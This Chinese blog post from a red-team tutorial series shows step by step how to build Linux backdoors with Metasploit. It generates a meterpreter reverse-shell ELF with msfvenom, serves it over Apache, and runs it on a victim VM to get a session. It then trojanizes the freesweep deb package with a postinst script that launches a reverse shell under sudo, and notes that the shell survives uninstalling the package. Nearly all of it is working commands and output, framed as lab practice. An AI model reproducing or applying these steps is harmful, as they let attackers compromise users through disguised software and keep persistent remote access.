红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]

红队/白帽必经之路(19)——如何用Metasploit 制作Linux恶意木马病毒/软件获取shell[既然是红队,那就对自己狠一点]

欢迎各位彦祖与热巴畅游本人专栏与博客你的三连是我最大的动力以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 


专栏跑道二
➡️ 24 Network Security -LJS 



​ 

专栏跑道三
➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五


➡️RHCE-LJS[Linux高端骚操作实战篇]

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]


上节回顾

目录

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 

专栏跑道二

➡️ 24 Network Security -LJS 

专栏跑道三

➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五

➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

上节回顾

1.实战-制作 Linux 恶意软件获取 shell

使用 msfvenom 生成 linux 可执行文件



参数补充详解:

开启 apache服务



MSF 配置监听[老样子4件套]

接着打开 centos 7.5 xuegod63 linux 虚拟机,新建一个终端:

下载后门

添加执行权限

执行程序

然后惊奇的发现MSF控制台已经建立Session喽

查看相关信息 

注意:

2.实战-制作恶意 deb 软件包来触发后门

制作恶意软件包使用--download-only 方式下载软件包不进行安装

将软件包移动到 root 目录

解压软件包到 free 目录

注意一下:

创建软件包信息目录

创建软件包的信息文件

补充一下:

创建 deb 软件包,安装后脚本文件,来加载后门

给脚本文件添加执行权限





构建新的 deb 安装包



新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

没什么好说的[MS4件套]



打包

回到 MSF 控制台



最后卸载软件包



就算恶意软件包被卸载,payload 依旧正常运行。



1.实战-制作 Linux 恶意软件获取 shell

使用 msfvenom 生成 linux 可执行文件

┌──(root㉿kali-2024)-[/home/ljs/Desktop] └─# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod Found 3 compatible encoders Attempting to encode payload with 1 iterations of x64/xor x64/xor succeeded with size 175 (iteration=0) x64/xor chosen with final size 175 Payload size: 175 bytes Final size of elf file: 295 bytes Saved as: /var/www/html/xuegod 

参数补充详解:
 

--platform 指定 linux-f 指定 elf 即 linux 操作系统的可执行文件类型-b 去掉坏字符

开启 apache服务

┌──(root㉿kali-2024)-[/home/ljs/Desktop] └─# /etc/init.d/apache2 start Starting apache2 (via systemctl): apache2.service. 


MSF 配置监听[老样子4件套]

msf6 exploit(multi/handler) > back msf6 > use exploit/multi/handler [*] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.53 LHOST => 192.168.1.53 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > run 

接着打开 centos 7.5 xuegod63 linux 虚拟机,新建一个终端:

下载后门
──(root㉿kali-2024)-[/home/ljs/Desktop] └─# wget http://192.168.1.53/xuegod

┌──(root㉿kali-2024)-[/home/ljs/Desktop] └─# ./xuegod 

添加执行权限
┌──(root㉿kali-2024)-[/home/ljs/Desktop] └─# chmod +x xuegod 
执行程序
┌──(root㉿kali-2024)-[/home/ljs/Desktop] └─# ./xuegod 

然后惊奇的发现MSF控制台已经建立Session喽

查看相关信息 
meterpreter > ifconfig

注意:
退出 session 需要使用 quit 正常退出 session 否则会影响下次连接。
meterpreter > quit

2.实战-制作恶意 deb 软件包来触发后门

制作恶意软件包使用--download-only 方式下载软件包不进行安装

──(root㉿kali-2024)-[/home/ljs/Desktop] └─# apt --download-only install freesweep 正在读取软件包列表... 完成 正在分析软件包的依赖关系树... 完成 正在读取状态信息... 完成 下列软件包是自动安装的并且现在不需要了: cpp-13 fonts-noto-color-emoji ibverbs-providers libboost-iostreams1.74.0 libboost-thread1.74.0 libcephfs2 libgfapi0 libgfrpc0 libgfxdr0 libglusterfs0 libibverbs1 libnsl-dev libpython3.11-dev librados2 librdmacm1 libtirpc-dev python3-lib2to3 python3.11-dev samba-ad-provision samba-dsdb-modules samba-vfs-modules 使用'apt autoremove'来卸载它(它们)。 下列【新】软件包将被安装: freesweep 升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 1798 个软件包未被升级。 需要下载 55.8 kB 的归档。 解压缩后会消耗 142 kB 的额外空间。 获取:1 http://kali.download/kali kali-rolling/main amd64 freesweep amd64 1.0.2-1 [55.8 kB] 已下载 55.8 kB,耗时 1秒 (38.4 kB/s) 于“仅下载”模式中下载完毕 

将软件包移动到 root 目录

┌──(root㉿kali-2024)-[/home/ljs/Desktop] └─# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ~/ 

解压软件包到 free 目录

┌──(root㉿kali-2024)-[/home/ljs/Desktop] └─# cd ~ ┌──(root㉿kali-2024)-[~] └─# dpkg -x freesweep_1.0.2-1_amd64.deb free 


注意一下:
生成软件包时无论是 payload 的和软件包信息都需要选择能够在目标操作系统上执行的创建软件包信息目录

生成恶意代码到软件包源文件中

┌──(root㉿kali-2024)-[~] └─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources 参数详解: msfvenom -a x64 \ # 使用 64 位架构 --platform linux \ # 目标平台为 Linux -p linux/x64/shell/reverse_tcp \ # 使用反向 TCP Shell 载荷 LHOST=192.168.1.53 \ # 设置攻击者的 IP 地址 LPORT=4444 \ # 设置攻击者的监听端口 -b "\x00" \ # 避免使用空字符(NULL 字符) -i 10 \ # 设置载荷编码的迭代次数为 10 -f elf \ # 输出为 ELF 格式的文件 -o /root/free/usr/games/freesweep_sources # 指定输出路径和文件名 

创建软件包信息目录

┌──(root㉿kali-2024)-[~] └─# mkdir free/DEBIAN && cd free/DEBIAN 

创建软件包的信息文件

补充一下:
为什么用 tee 而不是直接输出到文件? tee 不仅将内容写入文件,还会将它显示在标准输出上(即终端),使得你可以看到你所写入的内容。直接使用 >>> 可能无法显示文件内容。tee 适用于需要同时查看和写入文件的场景。'EOF' 引号的作用: 使用单引号 'EOF' 表示不会进行变量替换。这是一个安全的做法,特别是当文本中可能含有特殊字符时。如果不希望替换变量或转义字符,就使用单引号;如果希望进行变量替换,可以去掉引号,直接使用 << EOF
┌──(root㉿kali-2024)-[~] └─# tee /root/free/DEBIAN/control << 'EOF' heredoc> heredoc> Package: freesweep Version: 1.0.1-1 Section: Games and Amusement Priority: optional Architecture: amd64 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. EOF Package: freesweep Version: 1.0.1-1 Section: Games and Amusement Priority: optional Architecture: amd64 Maintainer: Ubuntu MOTU Developers ([email protected]) Description: a text-based minesweeper Freesweep: is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. 

创建 deb 软件包,安装后脚本文件,来加载后门

┌──(root㉿kali-2024)-[~] └─# tee /root/free/DEBIAN/postinst << 'EOF' heredoc> #!/bin/bash sudo chmod 2755 /usr/games/freesweep_sources sudo /usr/games/freesweep_sources & EOF #!/bin/bash sudo chmod 2755 /usr/games/freesweep_sources sudo /usr/games/freesweep_sources & 
 sudo /usr/games/freesweep_sources& 是将执行的恶意代码/命令放到后台运行

给脚本文件添加执行权限

┌──(root㉿kali-2024)-[~] └─# chmod 755 /root/free/DEBIAN/postinst 

构建新的 deb 安装包

┌──(root㉿kali-2024)-[~/free/DEBIAN] └─# dpkg-deb --build /root/free/ dpkg-deb: 正在 '/root/free.deb' 中构建软件包 'freesweep'。

注意:

会在当前目录下生成构建的软件包 freesweep.db ,我们当前的目录是~/free/DEBIAN
┌──(root㉿kali-2024)-[~/free/DEBIAN] └─# ls /root/free.deb /root/free.deb 


新打开一个终端 CTRL+SHIFT+T,生成 MSF 监听

┌──(root㉿kali-2024)-[~] └─# msfconsole Metasploit tip: Use the 'capture' plugin to start multiple authentication-capturing and poisoning services ___ ____ ,-"" `. < HONK > ,' _ e )`-._ / ---- / ,' `-._<.===-' / / / ; _ / ; (`._ _.-"" ""--..__,' | <_ `-"" \ <`- : (__ <__. ; `-. '-.__. _.' / \ `-.__,-' _,' `._ , /__,-' ""._\__,'< <____ | | `----.`. | | \ `. ; |___ \-`` \ --< `.`.< `-' =[ metasploit v6.3.55-dev ] + -- --=[ 2397 exploits - 1232 auxiliary - 422 post ] + -- --=[ 1391 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ msf6 > 

没什么好说的[MS4件套]

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.53 LHOST => 192.168.1.53 msf6 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/handler) > run 
最好是在 Kali 中执行如果再 XSHELL 中执行可能会导致窗口卡死

打包

dpkg -i free.deb # dpkg:用于管理Debian软件包的工具,-i:安装选项,free.deb:待安装的.deb包文件 

回到 MSF 控制台

meterpreter > getuid

最后卸载软件包

┌──(root㉿kali-2024)-[~] └─# dpkg -r freesweep (正在读取数据库 ... 系统当前共安装有 406336 个文件和目录。) 正在卸载 freesweep (1.0.2-1) ... 正在处理用于 man-db (2.12.0-3) 的触发器 ... 正在处理用于 hicolor-icon-theme (0.17-2) 的触发器 ... 正在处理用于 desktop-file-utils (0.27-1) 的触发器 ... 

就算恶意软件包被卸载,payload 依旧正常运行。

meterpreter > pwd
exit 退出即可


Read more

Flutter 三方库 jwt_io 的鸿蒙化适配指南 - 在鸿蒙系统上构建极致、严谨、全能的 JSON Web Token (JWT) 加解密与身份安全验证引擎

欢迎加入开源鸿蒙跨平台社区:https://openharmonycrossplatform.ZEEKLOG.net Flutter 三方库 jwt_io 的鸿蒙化适配指南 - 在鸿蒙系统上构建极致、严谨、全能的 JSON Web Token (JWT) 加解密与身份安全验证引擎 在鸿蒙(OpenHarmony)系统的端云一体化登录、政企应用的安全审计或复杂的跨端权限校验场景中,如何确保来自云端授信中心的 JWT Token 既能被正确解析(Decode),又能被严密地校验其合法性与过期时间?jwt_io 为开发者提供了一套工业级的、基于 RFC 7519 标准的 JSON Web Token 深度处理方案。本文将深入实战其在鸿蒙应用安全底座中的应用。 前言 什么是 JWT IO?它不仅是一个简单的 Base64 解码器,而是一个具备深厚 RFC

By Ne0inhk
解决 Android WebView 无法加载 H5 页面常见问题的实用指南

解决 Android WebView 无法加载 H5 页面常见问题的实用指南

目录 1. WebView 简介 2. 常见问题 3. 网络权限设置 4. 启用 JavaScript 5. DOM Storage 的重要性 6. 处理 HTTPS 问题 7. 设置 WebViewClient 8. 调试工具 9. 其他调试技巧 10. 结论 相关推荐 1. WebView 简介         Android WebView 是一种视图组件,使得 Android 应用能够显示网页内容。它基于 Chromium,具备现代浏览器的许多功能,包括支持 HTML5、CSS3 和 JavaScript。这使得 WebView 成为展示在线内容和混合应用开发的理想选择。 2.

By Ne0inhk
【递归,搜索与回溯算法 & 记忆化搜索】深入理解记忆化搜索算法:记忆化搜索算法小专题

【递归,搜索与回溯算法 & 记忆化搜索】深入理解记忆化搜索算法:记忆化搜索算法小专题

前言:实现记忆化搜索的一般步骤      (1) 实现记忆化搜索代码步骤         (2) 如何将暴搜代码转换成记忆化搜索代码?         (3)如何添加一个备忘录?         斐波那契数     题目解析         算法原理         解法一:递归        时间复杂度高是因为递归展开树有很多次重复计算,我们可以优化这些重复的计算;我们可以创建一个备忘录,当计算其中一个分支时,把计算出的 d(i) 放入一个"备忘录"中 ( i = 1 ....... n ),当递归其他分支时,我们通过备忘录存储好的计算结果,减少递归树额外重复的展开;     解法二:记忆化搜索    当我们在递归的时候,发现递归过程会重复进行完全相同的问题,我们就把这些完全相同的问题存储到额外创建的"备忘录"中,再后续递归出现相同问题,直接从备忘录中拿计算好的结果即可,避免不必要的重复递归;  所以记忆化搜索,就是一个带备忘录的递归;记忆化搜索,其实也是剪枝的一种方式,在本题使用记忆化搜索,就能把指数级别的时间复杂度降到常数

By Ne0inhk
【前端实战】Axios 错误处理的设计与进阶封装,实现网络层面的数据与状态解耦

【前端实战】Axios 错误处理的设计与进阶封装,实现网络层面的数据与状态解耦

目录 【前端实战】Axios 错误处理的设计与进阶封装,实现网络层面的数据与状态解耦 一、为什么网络错误处理一定要下沉到 Axios 层 二、Axios 拦截器 interceptors 1、拦截器的基础应用 2、错误分级和策略映射的设计 3、错误对象标准化 三、结语         作者:watermelo37         ZEEKLOG优质创作者、华为云云享专家、阿里云专家博主、腾讯云“创作之星”特邀作者、火山KOL、支付宝合作作者,全平台博客昵称watermelo37。         一个假装是giser的coder,做不只专注于业务逻辑的前端工程师,Java、Docker、Python、LLM均有涉猎。 --------------------------------------------------------------------- 温柔地对待温柔的人,包容的三观就是最大的温柔。 --------------------------------------------------------------------- 【前

By Ne0inhk